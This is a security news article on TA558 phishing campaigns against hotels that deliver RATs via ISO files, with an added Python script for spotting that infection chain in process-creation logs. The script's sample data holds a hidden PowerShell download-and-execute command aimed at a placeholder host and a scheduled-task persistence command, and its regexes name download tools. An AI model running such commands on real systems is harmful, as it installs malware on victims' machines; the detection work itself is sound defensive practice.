This year, a threat actor tracked as TA558 has stepped up its activity, launching phishing campaigns against hotels and other businesses in the hospitality and travel industries.
The threat actor gains access to target systems, performs reconnaissance, steals sensitive data, and ultimately defrauds the victims' customers, using a toolkit of 15 different malware families, mostly remote access trojans (RATs). Proofpoint recently observed an increase in TA558 activity, which may be tied to the tourism industry's recovery after two years of COVID-19 restrictions. TA558 has been active since 2018.
By 2022, TA558 had abandoned documents with embedded macros in its phishing emails in favor of RAR and ISO file attachments or embedded URLs. This mirrors a shift seen across other threat actors in reaction to Microsoft's decision to disable VBA and XL4 macros by default in Office, a feature attackers previously relied on to load, drop, and install malware via weaponized documents.
Written in English, Spanish, and Portuguese, the phishing emails that start the infection chain are sent to businesses in North America, Western Europe, and Latin America. The emails are about making reservations with the target company and pose as correspondence from conference planners, travel brokers, and other hard-to-reject sources. The URL in the message body, which is supposed to be a link for making a reservation, will deliver an ISO file to victims who click on it.
A batch file inside the ISO launches a PowerShell script that ultimately downloads the RAT payload to the victim's PC and creates a scheduled task for persistence. AsyncRAT or Loda was the payload in the majority of the incidents Proofpoint saw this year, while Revenge RAT, XtremeRAT, CaptureTela, and BluStealer were used on a smaller scale. For instance, one 2022 campaign used only Revenge RAT and relied on QuickBooks invoice lures instead of hotel bookings.
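The infection chain described above (batch file run from a mounted ISO, PowerShell download cradle, scheduled task for persistence) leaves a recognizable parent/child trail in process-creation telemetry. The following hunting script is an added example written for this article, not code from Proofpoint or from the original report. It walks Sysmon Event ID 1 style records and flags the full three-stage chain as high severity and a lone download cradle as medium. The event records, process IDs, paths and the `example.invalid` URL are all constructed for the example; the drive-letter heuristic assumes the ISO was mounted as a non-system drive, which is the default behaviour when a user double-clicks an ISO on Windows 8 and later.

```python
"""Hunt for the ISO -> batch -> PowerShell -> schtasks chain in process-creation events.

Each event is a dict in the shape of a Sysmon Event ID 1 record (pid, ppid,
image, cmdline). All events below are constructed sample data, not real telemetry.
"""
import re

# Constructed sample telemetry: one malicious chain (pids 501-503) and one benign admin chain (600-601).
EVENTS = [
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    # stage 1: cmd.exe runs a .bat from a mounted ISO (drive letter E:, assumed mount point)
    {"pid": 501, "ppid": 400, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "E:\reservation.bat"'},
    # stage 2: hidden PowerShell download cradle (URL is a placeholder)
    {"pid": 502, "ppid": 501, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/stage2')\""},
    # stage 3: scheduled task whose action is another PowerShell script
    {"pid": 503, "ppid": 502, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks.exe /create /sc minute /mo 5 /tn Updater '
                '/tr "powershell.exe -w hidden -f C:\\Users\\Public\\u.ps1"'},
    # benign: an administrator's backup batch file on the system drive
    {"pid": 600, "ppid": 400, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\scripts\backup.bat"'},
    {"pid": 601, "ppid": 600, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -f C:\scripts\backup.ps1"},
]

# Download cradle keywords commonly seen in PowerShell one-liners.
DOWNLOAD_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|bitstransfer", re.I)
# Flags that hide the window, bypass execution policy, or pass an encoded command.
EVASION_RE = re.compile(r"-(w(indowstyle)?\s+hidden|e(xecutionpolicy|p)\s+bypass|enc(odedcommand)?\b)", re.I)
# A .bat/.cmd launched from a drive letter other than C:, which is where a mounted ISO appears.
BAT_ON_MOUNT_RE = re.compile(r'\b([D-Z]):\\[^"\s]*\.(bat|cmd)\b', re.I)
SCHTASKS_CREATE_RE = re.compile(r"/create\b", re.I)


def _basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def stage_batch_from_mount(ev: dict) -> bool:
    """cmd.exe executing a batch file that lives on a non-system drive (assumed ISO mount)."""
    return _basename(ev["image"]) == "cmd.exe" and bool(BAT_ON_MOUNT_RE.search(ev["cmdline"]))


def stage_download_powershell(ev: dict) -> bool:
    """powershell.exe with both a download keyword and a hidden/bypass/encoded flag."""
    return (_basename(ev["image"]) == "powershell.exe"
            and bool(DOWNLOAD_RE.search(ev["cmdline"]))
            and bool(EVASION_RE.search(ev["cmdline"])))


def stage_schtasks_persistence(ev: dict) -> bool:
    """schtasks.exe /create whose task action launches PowerShell."""
    return (_basename(ev["image"]) == "schtasks.exe"
            and bool(SCHTASKS_CREATE_RE.search(ev["cmdline"]))
            and "powershell" in ev["cmdline"].lower())


def find_chains(events: list) -> list:
    """Return findings: 'high' for the full 3-stage chain, 'medium' for an isolated download cradle."""
    by_pid = {e["pid"]: e for e in events}

    def ancestors(ev):
        # Walk parent links upward until the parent is no longer in the event set.
        chain, cur = [], ev
        while cur["ppid"] in by_pid:
            cur = by_pid[cur["ppid"]]
            chain.append(cur)
        return chain

    findings, linked_ps = [], set()
    for ev in events:
        if not stage_schtasks_persistence(ev):
            continue
        anc = ancestors(ev)
        ps = next((a for a in anc if stage_download_powershell(a)), None)
        bat = next((a for a in anc if stage_batch_from_mount(a)), None)
        if ps and bat:
            findings.append({"severity": "high", "cmd_pid": bat["pid"],
                             "powershell_pid": ps["pid"], "schtasks_pid": ev["pid"]})
            linked_ps.add(ps["pid"])
    # Partial chain: the download cradle fired but no persistence was created (yet).
    for ev in events:
        if stage_download_powershell(ev) and ev["pid"] not in linked_ps:
            findings.append({"severity": "medium", "powershell_pid": ev["pid"],
                             "reason": "download cradle with evasion flags, no scheduled task seen"})
    return findings


if __name__ == "__main__":
    for f in find_chains(EVENTS):
        print(f)
```

The benign backup chain is not flagged because it runs from the system drive and its PowerShell invocation carries neither a download keyword nor an evasion flag; tune `BAT_ON_MOUNT_RE` if your environment legitimately runs batch files from removable or network drives.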
After infecting hotel systems with RAT malware, TA558 moves further into the network to steal customer information and stored credit card data, and to alter the web pages guests interact with so that reservation payments are rerouted to the attackers. The Marino Boutique Hotel in Lisbon, Portugal, had its Booking.com account hijacked in July 2022; over four days the attacker took €500,000 from unsuspecting customers who believed they were paying for a stay.
Although TA558’s participation in that incident was not established, it does match the threat actor’s TTPs and targeting range and, at the very least, illustrates how they may profit from their access to hotel systems. Other options for TA558 to gain money include selling or using the stolen credit card information, selling customer PII, extorting wealthy people, or giving ransomware groups access to the hotel’s network.